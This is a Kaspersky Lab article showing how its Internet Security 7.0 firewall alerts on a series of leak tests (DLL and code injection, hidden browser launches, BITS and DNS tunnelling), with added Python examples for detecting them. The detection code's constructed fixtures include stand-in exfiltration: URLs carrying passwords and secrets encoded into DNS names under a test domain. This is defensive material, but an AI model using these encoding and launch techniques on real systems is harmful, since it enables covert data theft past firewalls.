Controlling outgoing network traffic with Kaspersky Internet Security 7.0

Table of Contents

INTRODUCTION
  1. SUBSTITUTION
    1. TEST RUNNER
    2. TEST LEAKTEST
    3. TEST COAT
  2. LAUNCHING
    1. TEST GHOST
    2. TEST TOOLEAKY
    3. TEST WALLBREAKER
      1. Test Wallbreaker No.1
      2. Test Wallbreaker No.2
      3. Test Wallbreaker No.3
      4. Test Wallbreaker No.4
  3. DLL INJECTION
    1. TEST CPILSUITE No.2
    2. TEST CPILSUITE No.3
    4. TEST FIREHOLE
    4. TEST JUMPER
    5. TEST PCAUDIT
    6. TEST PCAUDIT2
  4. CODE INJECTION
    1. TEST AWFT
      1. Test AWFT No.1
      2. Test AWFT No.2
      3. Test AWFT No.3
      4. Test AWFT No.4
      5. Test AWFT No.5
      6. Test AWFT No.6
    2. TEST COPYCAT
    3. TEST CPIL
    4. TEST CPILSUITE No.1
    5. TEST DNSTEST
    6. TEST THERMITE
  5. BROWSER SERVICES
    1. TEST BREAKOUT
    2. TEST PCFLANK
    3. TEST SURFER
    4. TEST ZABYPASS
  6. SYSTEM SERVICES
    1. TEST BITSTESTER
    2. TEST BREAKOUT2
    3. TEST DNSTESTER
CONCLUSION

Introduction

One of the main ways in which personal firewalls are evolving is by combining firewall technologies per se (i.e., analysis of the network activity of applications) with heuristic analysis of application activity and application integrity control. One of the reasons for this is the development of technologies for evading firewall protection (i.e., leaks), which cannot be blocked without heuristic analysis of application activity.

The purpose of this article is to demonstrate the leak prevention capabilities of Kaspersky Internet Security 7.0 (KIS 7.0). To do this, we used existing leak tests (for more information about leaks and the leak test classification, please see the article Using leak tests to evaluate firewall effectiveness at http://www.viruslist.com/en/analysis?pubid=204791977).

One of the most important issues relating to any test is the settings used when testing a product. With Kaspersky Internet Security 7.0, the user can choose between two protection modes, basic and interactive, when configuring the product using the wizard launched after product installation.

In the basic mode, the product asks the user significantly fewer questions than in the interactive mode, providing a slightly lower level of protection. For most users, this mode offers a reasonable balance between security and convenience.

Advanced users can select the interactive protection mode, which offers maximum protection, provided that the user responds reasonably to the product’s prompts and alerts.

In this article, we demonstrate how Kaspersky Internet Security 7.0 responds to leak tests in the interactive protection mode.

It may be the firewall that responds to leaks, alerting the user to applications’ attempts to initiate network activity, or the proactive defense module may respond, alerting the user to suspicious local activity of applications. Clicking the Block or Deny button in any alert window will stop the leak test and prevent an information leak.

The table below summarizes the existing leak tests, which are grouped according to the methods used to evade firewall protection.


No.  Method             Leak tests
1    Substitution       Runner, LeakTest, Coat
2    Launching          Ghost, TooLeaky, Wallbreaker
3    DLL injection      CPILSuite [2,3], FireHole, Jumper, pcAudit, pcAudit2
4    Code injection     AWFT, CopyCat, CPIL, CPILSuite [1], DNStest, Thermite
5    Browser services   Breakout, OSfwbypass, PCFlank, Surfer, ZAbypass
6    System services    BITSTester, Breakout2, DNStester


Note that some leak tests use several evasion mechanisms. An example is CPILSuite [2], which uses the injection of code into a trusted process (DLL injection) in order to launch the browser with command line parameters on behalf of that process (Launching). In such cases, leak tests are categorized according to the first evasion mechanism used.

Below, we discuss leak tests in the following order: first, all the leak tests in the Substitution category, from Runner to Coat, then leak tests in the Launching category, etc. The last leak test discussed is DNStester.

In the interactive mode, Kaspersky Internet Security 7.0 successfully passes all the existing leak tests. For each test, we show the alert window displayed by Kaspersky Internet Security 7.0.

Substitution

Replacing the executable file of a trusted application on the hard drive or substituting the data of a trusted process in RAM for that of an unknown process. The idea behind this method is to ‘convince’ the firewall that the network activity was initiated by a trusted process.

In all three tests in the Substitution category, the Kaspersky Internet Security 7.0 firewall alerts the user to the outbound network activity of the application used in the leak test.

Test Runner

The leak test attempts to find the default browser and replace its executable file on the hard drive with its own copy.

Kaspersky Internet Security 7.0 warns the user that the browser’s executable file has changed:



After this, even if the user allowed the file to be replaced, Kaspersky Internet Security 7.0 prompts the user to allow or block network activity for the leak test’s application:



Test LeakTest

This was one of the first leak tests to appear. It relies on an unknown application taking the file name of a trusted one: the program renames itself to the name of a known network program and attempts to establish a TCP connection to grc.com:80 (the web server of Gibson Research Corporation).

The Kaspersky Internet Security 7.0 firewall alerts the user to the outbound network activity of the leak test application:



Coat leak test

After loading into RAM, the leak test replaces data in its process with data identical to that of the default Internet browser and attempts to establish a network connection.

The Kaspersky Internet Security 7.0 firewall warns the user of the leak test application’s outbound network activity:



After clicking on the Details… link, the user can view additional information about the connection that the leak test application is trying to establish, including the remote node address, as well as the full path to the file of the process attempting to establish the connection:
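The following is an added example, not code from the original article or from Kaspersky's product. It shows why a firewall rule keyed only on an executable's file name is defeated by the two on-disk substitution tricks above (LeakTest renames itself; Runner overwrites the trusted file), and why recording a hash of the file when the rule is created forces a new prompt. The "browser" and "leak test" files are constructed stand-ins written to a temporary directory; the rule-set classes and their decision strings are this example's own.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_of_file(path):
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class NameRuleSet:
    """Naive rule set: the rule is keyed on the executable's file name only."""

    def __init__(self):
        self.allowed = set()

    def allow(self, path):
        self.allowed.add(os.path.basename(path).lower())

    def decision(self, path):
        return "allow" if os.path.basename(path).lower() in self.allowed else "prompt"


class IntegrityRuleSet:
    """Rule keyed on the full path plus a hash of the file taken when the rule is made."""

    def __init__(self):
        self.allowed = {}

    def allow(self, path):
        self.allowed[os.path.abspath(path)] = sha256_of_file(path)

    def decision(self, path):
        key = os.path.abspath(path)
        if key not in self.allowed:
            return "prompt"            # unknown application: ask the user
        if self.allowed[key] != sha256_of_file(path):
            return "prompt-changed"    # file replaced since the rule was created: ask again
        return "allow"


def simulate():
    """Replays LeakTest and Runner against both rule sets; returns the decisions."""
    tmp = tempfile.mkdtemp()
    try:
        browser = os.path.join(tmp, "browser", "iexplore.exe")
        leaktest = os.path.join(tmp, "tests", "leaktest.exe")
        os.makedirs(os.path.dirname(browser))
        os.makedirs(os.path.dirname(leaktest))
        with open(browser, "wb") as f:
            f.write(b"constructed stand-in for the browser image")   # constructed content
        with open(leaktest, "wb") as f:
            f.write(b"constructed stand-in for the leak test image")  # constructed content

        by_name, by_hash = NameRuleSet(), IntegrityRuleSet()
        by_name.allow(browser)          # the user allowed the browser once
        by_hash.allow(browser)
        results = {}

        # LeakTest: the unknown binary takes the trusted program's file name.
        renamed = os.path.join(os.path.dirname(leaktest), "iexplore.exe")
        shutil.copyfile(leaktest, renamed)
        results["leaktest"] = (by_name.decision(renamed), by_hash.decision(renamed))

        # Runner: the trusted executable on disk is overwritten with the leak test's copy.
        shutil.copyfile(leaktest, browser)
        results["runner"] = (by_name.decision(browser), by_hash.decision(browser))
        return results
    finally:
        shutil.rmtree(tmp, ignore_errors=True)
```

The hash check only covers the file on disk. Coat changes the process's data in memory after loading, so the file still matches its recorded hash; the identity check must then be made against the running process, which is why the alert's Details… window shows the full path of the process actually opening the connection.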



Launching

Launching a trusted application with command line parameters.

This method is based on the fact that most browsers accept the address of the web page to be opened as a command line parameter. If the web page includes a server side script (e.g., cgi), the address line can also include parameters that will be used by the script as input. These parameters can include confidential information, e.g., data stolen by a spyware program. Importantly, all network activity is generated by the browser as usual, so it will always be allowed in accordance with the firewall rules.

To prevent the user from noticing the browser window, the browser is usually launched in hidden mode (Ghost, TooLeaky, Wallbreaker [1]). Malicious code can also launch the browser using other processes rather than launching it directly.

When launching any of the leak tests described below in this section, Kaspersky Internet Security 7.0 regards the activity of the leak test’s application as suspicious and prompts the user for action. Additional information that the user can view includes the path to the browser file being launched and the command line parameters used. In the case of a genuine malicious application, this window would show the information that the application is attempting to send to a cybercriminal.

Ghost leak test

This leak test attempts to deceive protection by restarting its own process in order to change its PID, i.e., process identifier. Then it launches the browser in hidden mode with command line parameters.





TooLeaky leak test

This leak test attempts to launch a browser in hidden mode with command line parameters.





Wallbreaker leak test

Wallbreaker leak test No. 1

This leak test attempts to launch a browser in hidden mode with command line parameters.





Wallbreaker leak test No. 2

This leak test attempts to launch an Internet browser using the Windows shell process (explorer.exe).





Wallbreaker leak test No. 3

This leak test attempts to launch the browser using the Windows shell process (explorer.exe), which itself is launched using the command interpreter cmd.exe.





Wallbreaker leak test No. 4

This leak test attempts to launch the browser using the Windows task scheduling mechanism. In this case, the processes are launched in the following sequence: at.exe — svchost.exe — cmd.exe — explorer.exe — iexplore.exe.
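The check behind the prompts in this section, as an added example (not the article's or Kaspersky's code): given process-creation events, find browser launches whose URL carries query-string parameters, then look at who launched the browser and through which ancestors. The events are constructed to mirror a direct TooLeaky-style launch and the Wallbreaker No. 4 chain; the field layout, the browser list and the finding strings are this example's assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}
# Ancestors that make a browser launch carrying data worth a prompt.
SUSPICIOUS_ANCESTORS = {"at.exe", "cmd.exe", "svchost.exe"}
URL_RE = re.compile(r"""https?://[^\s"']+""")

# Constructed process-creation events: (pid, ppid, image name, command line).
# pid 1 stands for an ancestor outside the log (e.g. services.exe).
EVENTS = [
    (100, 1,   "explorer.exe", "explorer.exe"),
    # TooLeaky-style: a user-mode program launches the browser directly.
    (200, 100, "tooleaky.exe", "tooleaky.exe"),
    (201, 200, "iexplore.exe", 'iexplore.exe "http://example.test/cgi-bin/leak.cgi?user=alice&pw=s3cret"'),
    # Wallbreaker No. 4: at.exe submits the job to the Task Scheduler service
    # (hosted in svchost.exe) over RPC, so at.exe -> svchost.exe is not a
    # parent/child link; svchost.exe -> cmd.exe -> explorer.exe -> iexplore.exe are.
    (300, 100, "at.exe",       "at.exe 10:00 cmd /c start explorer.exe"),
    (301, 1,   "svchost.exe",  "svchost.exe -k netsvcs"),
    (302, 301, "cmd.exe",      "cmd /c start explorer.exe"),
    (303, 302, "explorer.exe", "explorer.exe"),
    (304, 303, "iexplore.exe", 'iexplore.exe "http://example.test/report?data=ZmFrZSBkYXRh"'),
    # Ordinary browsing started from the shell: no parameters, not flagged.
    (400, 100, "iexplore.exe", 'iexplore.exe "http://example.test/"'),
]


def ancestry(pid, events):
    """Image names from pid's parent upwards, following ppid links in the log."""
    by_pid = {e[0]: e for e in events}
    chain, seen = [], set()
    ppid = by_pid[pid][1]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        chain.append(by_pid[ppid][2].lower())
        ppid = by_pid[ppid][1]
    return chain


def url_parameters(cmdline):
    """First URL on the command line and its query-string parameters."""
    m = URL_RE.search(cmdline)
    if not m:
        return None, {}
    url = m.group(0)
    return url, dict(parse_qsl(urlsplit(url).query))


def analyze_launches(events):
    """Browser launches that carry data and were not started by the user's shell."""
    findings = []
    for pid, ppid, image, cmdline in events:
        if image.lower() not in BROWSERS:
            continue
        url, params = url_parameters(cmdline)
        if not params:
            continue                      # plain navigation: nothing carried in the query
        chain = ancestry(pid, events)
        parent = chain[0] if chain else "<unknown>"
        hits = SUSPICIOUS_ANCESTORS.intersection(chain)
        if parent != "explorer.exe":
            reason = "parent %s is not the shell" % parent
        elif hits:
            reason = "shell reached through %s" % ", ".join(sorted(hits))
        else:
            continue
        findings.append({"pid": pid, "parent": parent, "chain": chain,
                         "url": url, "params": params, "reason": reason})
    return findings
```

The parameters returned for each finding are what the alert's Details… window would show as the data being sent; an empty query string means the launch is worth less attention than one carrying a value.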





DLL injection

Injecting a dynamic link library into the address space of a trusted process. This method loads a malicious program’s dynamic link library into the address space of a trusted process.

Several of the tests below install a global hook (SetWindowsHookEx with a thread ID of 0), which makes Windows map the hook DLL into every process that receives the hooked events. In response to such an attempt to load a dynamic link library into other processes, the proactive defense module of Kaspersky Internet Security 7.0 prompts the user for action, since this behavior is characteristic of many malicious programs.

After clicking on the Details… link, the user can view the full path to the module being injected and information about the module.

CPILSuite leak test No. 2

The leak test attempts to inject a dynamic link library (cpil2.dll) into the address space of a trusted process (in this case the Windows shell, explorer.exe) by installing a global hook. After this, the browser is launched with command line parameters on behalf of the trusted process (see previous section).

After clicking on the Details… link, a window displaying additional information opens. It can be seen from the information provided that the DLL is on the hard drive next to the leak test’s executable file, and that the library carries no description or version information. A location outside the standard system paths and the absence of information about the module (name, version, vendor) are characteristic of many malicious programs.





When the browser is launched with command line parameters, Kaspersky Internet Security 7.0 displays a user alert:





CPILSuite leak test No. 3

This leak test attempts to inject a dynamic link library (cpil3.dll) into the address space of a trusted process (in this case the Windows shell, explorer.exe) by installing a global hook. Then it attempts to take control of a browser on behalf of the trusted process using a program interface provided by the browser (see section 5).

As in the previous test, an attempt to load a dynamic link library into all processes will result in an alert being displayed by the proactive defense module of Kaspersky Internet Security 7.0:





If the user allows the DLL to be loaded by selecting the relevant option in the alert window, the proactive defense module of Kaspersky Internet Security 7.0 will open one more alert window warning the user that the application explorer.exe is attempting to control the browser programmatically. Such behavior is not typical of the Windows shell process, which means that the alert is probably the result of an infection. To determine which application is attempting to act on behalf of a trusted process, the user should search the proactive defense module’s log for records related to code injection, DLL injection and other similar events.





FireHole leak test

This leak test launches an Internet browser and attempts to inject a dynamic link library into the browser’s address space by installing a global hook. As in previous tests, an attempt to load a dynamic link library into all processes causes the proactive defense module of Kaspersky Internet Security 7.0 to display a user alert window.





Jumper leak test

The leak test attempts to have its dynamic link library loaded into the address space of trusted processes. To do this, it adds the library to the AppInit_DLLs value (under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows), a list of DLLs that user32.dll loads into every process that links user32.dll, which on a desktop system is most processes.

The registry guard feature in the proactive defense module of Kaspersky Internet Security 7.0 warns the user when a library is being added to this value and recommends blocking the change, unless the user actually wants the DLL to be loaded by the system into every new process.





Even if the user did allow the DLL to be loaded into all processes, the application integrity module of Kaspersky Internet Security 7.0 will warn the user of the attempt to load a new module into the address space of a trusted application’s process after the trusted application is launched.



pcAudit leak test

The leak test attempts to inject a dynamic link library into the address space of trusted processes by installing a global hook. Then it attempts to access the Internet on behalf of a trusted process.

As with other leak tests, an attempt to load a dynamic link library into all processes will cause the proactive defense module of Kaspersky Internet Security 7.0 to display an alert window.





pcAudit2 leak test

This leak test is similar to the pcAudit test. It attempts to inject a dynamic link library into the address space of trusted processes by installing a global hook. Then it attempts to access the Internet on behalf of a trusted process.

An attempt to load a dynamic link library into all processes causes the proactive defense module of Kaspersky Internet Security 7.0 to display an alert window. After clicking on the Details… link, an additional information window is displayed. In this window, it is important to note that no information about the dynamic link library is provided. This is typical of malicious (and test) applications. The History of process activity tab is also of interest, since it shows all file and registry operations performed by the application. It is easy to see that the library being injected into all processes (baqsesrv.dll) was initially not present in the system and was created by the leak test application itself. Many malicious programs operate in this way, ‘extracting’ additional modules from their resources. According to Kaspersky Lab classification, such applications are categorized as Trojan-Droppers.
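The three signals the Details… window exposes for CPILSuite No. 2, Jumper and pcAudit2 (a module without version information, loaded from outside the system directories, and created moments earlier by the very process that then gets it loaded into many others) can be combined into one triage rule over module-load telemetry. The block below is an added example, not code from the article or from Kaspersky; the event records, paths and the `version info` field (standing in for the PE version resource a real sensor would read) are constructed, and the thresholds are this example's assumptions.

```python
from collections import defaultdict

SYSTEM_DIRS = ("c:/windows/system32/", "c:/windows/syswow64/", "c:/program files/")
FAN_OUT_THRESHOLD = 3      # distinct host processes that suggest a global hook
DROPPER_WINDOW = 600       # seconds between file creation and first load

# Constructed events, in time order (seconds).
FILE_CREATES = [  # (time, creating process, path)
    (10, "pcaudit2.exe", r"C:\Tests\baqsesrv.dll"),
]
MODULE_LOADS = [  # (time, host process, module path, version info or None)
    (11, "explorer.exe", r"C:\Tests\baqsesrv.dll", None),
    (12, "iexplore.exe", r"C:\Tests\baqsesrv.dll", None),
    (13, "svchost.exe",  r"C:\Tests\baqsesrv.dll", None),
    (14, "explorer.exe", r"C:\Windows\System32\shell32.dll",
         {"company": "Microsoft Corporation", "version": "6.0.6000.16386"}),
    (15, "outlook.exe",  r"C:\Program Files\Vendor\spell.dll",
         {"company": "Vendor Inc.", "version": "2.1"}),
    (16, "notepad.exe",  r"C:\Tests\helper.dll", None),
]


def normalize(path):
    """Case-folded, forward-slash form used as the key for every module path."""
    return path.lower().replace("\\", "/")


def triage(file_creates, module_loads, fan_out=FAN_OUT_THRESHOLD, window=DROPPER_WINDOW):
    """Per module: hosting processes, the flags raised, the dropping process (if any)
    and a verdict. A module is 'suspicious' only when it fans out into several
    processes AND either was just dropped or carries no version information."""
    created_by = {normalize(p): (t, proc) for t, proc, p in file_creates}
    hosts, first_load, version = defaultdict(set), {}, {}
    for t, host, path, info in module_loads:
        key = normalize(path)
        hosts[key].add(host.lower())
        first_load[key] = min(t, first_load.get(key, t))
        version[key] = info

    report = {}
    for key, procs in hosts.items():
        flags = []
        if version[key] is None:
            flags.append("no version information")
        if not key.startswith(SYSTEM_DIRS):
            flags.append("outside system paths")
        if len(procs) >= fan_out:
            flags.append("loaded into %d processes" % len(procs))
        dropped_by = None
        if key in created_by:
            t_create, creator = created_by[key]
            delta = first_load[key] - t_create
            if 0 <= delta <= window:
                dropped_by = creator
                flags.append("created by %s %ds before first load" % (creator, delta))
        if len(procs) >= fan_out and (dropped_by or version[key] is None):
            verdict = "suspicious"
        elif flags:
            verdict = "review"
        else:
            verdict = "benign"
        report[key] = {"hosts": sorted(procs), "flags": flags,
                       "dropped_by": dropped_by, "verdict": verdict}
    return report
```

Fan-out alone is not conclusive (input-method editors and accessibility tools are legitimately hooked into every window), which is why the rule demands a second signal before escalating beyond "review".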







Code injection

Injecting code into the address space of a trusted process without using a dynamic link library. This method writes executable code directly into the address space of a trusted process. After injection, this code can initiate any network activity, since the firewall will regard it as activity by the trusted application. Unlike DLL injection, which has many legitimate uses, this operation is rarely legitimate, even though Windows provides documented functions for writing to another process’s memory and starting threads in it (WriteProcessMemory, CreateRemoteThread). Such code injection is sometimes used by legitimate programs (e.g., debuggers), but is mostly used by malicious software.

There are numerous methods for injecting code into other applications’ processes. The processes most often attacked are those of Internet browsers, the operating system shell (explorer.exe) and svchost.exe, the host process for Windows services implemented as dynamic link libraries (several instances normally run at once).

When any of the leak tests described below attempts to patch the memory of another process, the proactive defense module of Kaspersky Internet Security 7.0 displays an alert window, because such behavior is typical of many malicious programs. After clicking on the Details… link, the user can view the name of the process into which code is being injected.

AWFT leak test

AWFT leak test No. 1

This leak test launches an Internet browser and attempts to patch its process’s memory.





AWFT leak test No. 2

This leak test launches an Internet browser and attempts to create a so-called remote execution thread controlled by the leak test's process.





AWFT leak test No. 3

This leak test attempts to create a remote execution thread in the Windows shell process (explorer.exe).





AWFT leak test No. 4

This leak test attempts to create a remote execution thread in the Windows shell process (explorer.exe) in order to use the thread to launch the Internet browser and patch its memory prior to execution.





AWFT leak test No. 5

This leak test attempts to create a remote execution thread in the Windows shell process (explorer.exe) in order to use the thread to launch a network application and patch its memory prior to execution. Before this, the leak test performs a heuristic search for suitable network applications installed on the computer.





AWFT leak test No. 6

This leak test performs a heuristic search for network applications installed on the computer and prompts the user to select one of them. Then it attempts to create a remote execution thread in the process selected.





Unlike other leak tests, AWFT awards points for passing each of the six variants of the test and then calculates a firewall’s score based on the points awarded. Kaspersky Internet Security 7.0 scores 10 points out of a maximum of 10:



CopyCat leak test

This leak test uses a special Windows API function, SetThreadContext, to gain control over a thread in the trusted process of the Internet browser.





CPIL leak test

The leak test attempts to patch the memory of the Windows shell process (explorer.exe) by loading its own dynamic link library into it. Then it launches an Internet browser on behalf of the trusted process and transfers data to a remote server.





CPILSuite leak test No. 1

As in the case of CPIL, this leak test attempts to patch the memory of the Windows shell process, explorer.exe, in order to launch an Internet browser on behalf of the trusted process and send data to a remote server. But before this, it tries to protect this operation from being detected by the firewall by removing its hooks. The leak test does this by accessing the physical memory of the computer.

Kaspersky Internet Security 7.0 alerts the user to the leak test application’s suspicious actions, i.e., its attempts to access the physical memory, inject code into the explorer.exe process and launch the browser with command line parameters.













DNStest leak test

This leak test launches the svchost.exe process (the main process for Windows services loaded from dynamic link libraries) and attempts to patch its memory. Successfully performing this operation would allow the leak test to send data over the Internet on behalf of the svchost.exe process, since any firewall usually includes several permission rules for this process (e.g., rules for the DNS service).

As with the other leak tests, Kaspersky Internet Security 7.0 responds to attempts to inject code into other processes with its standard alert window. Here, the Child processes tab of the Details… window is of interest: it lists every process launched by the process whose suspicious behavior triggered the alert. The presence of system processes on that list (svchost.exe in this case) is highly suspicious and indicates that the parent process is likely to be malicious.







Thermite leak test

This leak test attempts to find an Internet browser process that is running, injects its code into that process and creates a remote execution thread in it. This thread is then controlled by the leak test’s process. A socket connection is created in the thread, via which data is sent to a remote server.





Browser services

Using program interfaces to control an Internet browser. This method exploits various mechanisms in Windows that are designed to facilitate interaction between the processes of different components / applications.

Breakout leak test

This leak test sends two Windows messages to an Internet browser’s window: the first changes the value in the address bar and the second presses the browser’s Go button (causing the browser to go to the address specified in the address bar).

Kaspersky Internet Security 7.0 regards such activity by the application as an attempt to send data using a trusted process and displays an alert window. After clicking on the Details… link, the user can view the path to the process’s file and the address of the website to which data is being sent, as well as view the data that the leak test is trying to send (in this leak test, the string of data being sent is empty, but in other leak tests, e.g., PCFlank, the data that the leak test is trying to send can be seen).





PCFlank leak test

This leak test uses an Internet browser as a COM automation server in an attempt to send data to a remote server without the user’s knowledge.

Kaspersky Internet Security 7.0 regards this activity as an attempt to send data using a trusted process and displays an alert window. After clicking on the Details… link, the user can view the path to the process’s file, the address of the website to which data is being sent and the data being sent.





Surfer leak test

This leak test uses another program interface provided by Internet Explorer – the DDE (Dynamic Data Exchange) mechanism. The leak test creates a hidden desktop and launches an Internet browser process with command-line parameters inside it, controlling it by sending it DDE commands.

Kaspersky Internet Security 7.0 regards this activity as suspicious and displays an alert window to warn the user that the leak test’s application, surfer.exe, is attempting to control the browser programmatically. Additionally, Kaspersky Internet Security 7.0 displays an alert to warn the user of an attempt to launch the browser with command line parameters.







ZAbypass leak test

This leak test uses dynamic data exchange (DDE) mechanisms to control Internet Explorer and launch it with command line parameters.

Kaspersky Internet Security 7.0 displays an alert warning the user of an attempt to launch the browser with command line parameters. The parameters used can be viewed in the Details… window.





System services

Using program interfaces provided by system services. This method is similar to the method discussed above. The difference is that the program interfaces that are used are provided by operating system components rather than an Internet browser.

BITSTester leak test


This leak test uses BITS (Background Intelligent Transfer Service), a background file-transfer service built into Windows XP and later, which can be used to download files from a specified server on the Internet. The operating system uses this service to download its own updates (Windows Update), which means that permission rules are usually configured for it.

Kaspersky Internet Security 7.0 categorizes the use of the BITS service as hidden data sending using a trusted application and displays an alert window. Upon clicking on the Details… link, the user can view the path to the process’s file, the address of the website to which data is being sent and view the data being sent (no data is sent by this leak test).





Breakout2 leak test

This leak test creates a file named dingens.htm and uses the interface for managing Windows desktop elements and wallpapers to set this html page as the Windows wallpaper. The html page includes an element that links to an external page, http://www.dingens.org/breakout.html, resulting in this page being loaded when the new desktop wallpaper is activated.

An attempt to set an html page as the Windows wallpaper results in Kaspersky Internet Security 7.0 alerting the user to an attempt to launch the browser with command line parameters.





DNStester leak test

This leak test uses the DNS service (Windows DNS API functions) to send data to a remote computer. The data is encoded in the names being resolved: the local resolver forwards each query through recursive resolution until it reaches the server authoritative for the attacker’s domain, which simply records the names it receives. No direct connection from the leak test to that server is needed, and the only network traffic the firewall sees comes from the DNS client service.

Kaspersky Internet Security 7.0 detects an attempt to query a DNS server and alerts the user.
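Because the data travels inside query names, the detection signal is in the names themselves rather than in any connection. The block below is an added example, not code from the article or from Kaspersky: it builds a constructed query log (a hex-encoded message split into labels, the way DNStester-style tools carry data) alongside ordinary browsing, and flags a process that resolves many distinct, long-labelled names under one domain. It assumes a log that attributes each query to the calling process, as ETW DNS-client tracing does; on the wire only the DNS client service is visible. Thresholds and the `.test` domains are this example's own.

```python
import binascii
import math
from collections import defaultdict


def encode_as_labels(payload, label_len=16):
    """Hex-encodes payload and splits it into DNS labels; used only to build
    the constructed query log below."""
    hexed = binascii.hexlify(payload).decode()
    return [hexed[i:i + label_len] for i in range(0, len(hexed), label_len)]


def build_queries():
    """Constructed query log: (calling process, queried name)."""
    queries = [
        ("iexplore.exe", "www.example.test"),
        ("iexplore.exe", "static.example.test"),
        ("iexplore.exe", "www.example.test"),
    ]
    for i, chunk in enumerate(encode_as_labels(b"my secret password is hunter2")):
        queries.append(("dnstester.exe", "%s.%d.exfil.test" % (chunk, i)))
    return queries


def shannon_entropy(s):
    """Bits of entropy per character of s (reported, not thresholded)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for c in s:
        counts[c] += 1
    n = len(s)
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def base_domain(qname):
    """Last two labels; a public-suffix list would be needed for real data."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def analyze_queries(queries, min_distinct=4, min_label_len=12):
    """Per (process, domain): distinct names, mean length and entropy of the
    longest label, and whether the pattern looks like data carried in names."""
    groups = defaultdict(set)
    for proc, qname in queries:
        groups[(proc, base_domain(qname))].add(qname.lower())
    report = {}
    for key, names in groups.items():
        longest = [max(n.split("."), key=len) for n in names]
        mean_len = sum(len(l) for l in longest) / len(longest)
        mean_ent = sum(shannon_entropy(l) for l in longest) / len(longest)
        report[key] = {
            "distinct": len(names),
            "mean_label_len": round(mean_len, 1),
            "mean_entropy": round(mean_ent, 2),
            "suspicious": len(names) >= min_distinct and mean_len >= min_label_len,
        }
    return report
```

Content-delivery networks also produce many distinct subdomains, so in practice the per-process attribution is what separates a browser fetching assets from an unknown program resolving names it has no business resolving.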





Conclusion

According to the ranking at http://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php, Kaspersky Internet Security 7.0.0.125 provides very good protection from leaks, scoring much higher than the products of other major vendors in the IT security industry.

Unfortunately, the existing set of leak tests is no longer optimal for evaluating the true level of protection provided by different firewalls from leaks: a number of leak tests are based on the same leak mechanism, while some leak mechanisms are not implemented in any leak tests. Therefore, we welcome the decision of the www.matousec.com team to develop a new set of leak tests from scratch and are prepared to work together with the Matousec group in order to design a truly effective set of leak tests.

P.S. When this article was being prepared for publication, David Matoušek launched a new project, Firewall Challenge, which supersedes the Windows Personal Firewall Analysis project. The new project tests personal firewalls, integrated security systems and other similar products.

Unlike the previous project, Firewall Challenge includes not only leak tests, but also tests that analyze such security product characteristics as stability, self-protection and the ability to block security system evasion methods that do not target specific aspects of security system implementation.

Although a number of important aspects of security software are not covered by the new project, we regard the launch of Firewall Challenge as a significant step forward in developing methodologies for testing and evaluating personal firewalls and integrated security products.

Copyright © 1997 - 2009 Kaspersky Lab. All rights reserved.